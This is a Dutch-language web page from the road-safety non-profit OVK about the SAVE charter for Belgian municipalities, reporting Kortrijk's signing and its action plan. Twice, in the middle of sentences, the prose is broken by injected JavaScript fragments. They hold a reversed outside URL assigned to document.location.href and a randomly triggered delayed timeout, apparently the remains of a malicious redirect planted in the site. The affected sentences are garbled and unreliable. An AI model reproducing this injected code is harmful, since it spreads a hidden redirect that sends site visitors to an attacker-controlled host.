Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Kortrijk ondertekent SAVE-charter

De stad Kortrijk ondertekende op maandag 22 februari als 64ste in Vlaanderen en 14e in West-Vlaanderen het SAVE-charter Steden & Gemeenten. Kortrijk is daarmee de 5e centrumstad in Vlaanderen  en de 3e centrumstad in West-Vlaanderen die dit engagement neemt (van de 13 in toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaal). Ze werd voorafgegaan door Sint-Niklaas, Roeselare, Turnhout en Brugge.

Het actieplan van Kortrijk werd al gefinaliseerd vooraleer Kortrijk het charter ondertekende. Wat onder andere opvalt in het actieplan van Kortrijk is de vele partnerschappen die de stad aangaat om te werken aan verkeersveiligheid. Enkele van hun partners zijn onder andere: de scholen, een vrijwilligersgroep voor Trage Wegen, de Provincie, NMBS, de jeugdraad, Cambio, het OCMW en Parko. Deze laatste zou je niet meteen verwachten in het lijstje. Maar Parko wendt een deel van haar inkomsten van autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toparkeerinfrastructuur aan om te investeren in fietsinfrastructuur in Kortrijk.

Enkele acties uit het actieplan zijn: de start van de systematische heraanleg van kruispunten met de meeste verkeersongevallen, uitbreiding van het aantal fietsstraten, start proefproject schoolstraten, verdere uitbreiding zone 30, deelname aan de testkaravaan met oog op duurzame mobiliteit, een update van het scholencharter…


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be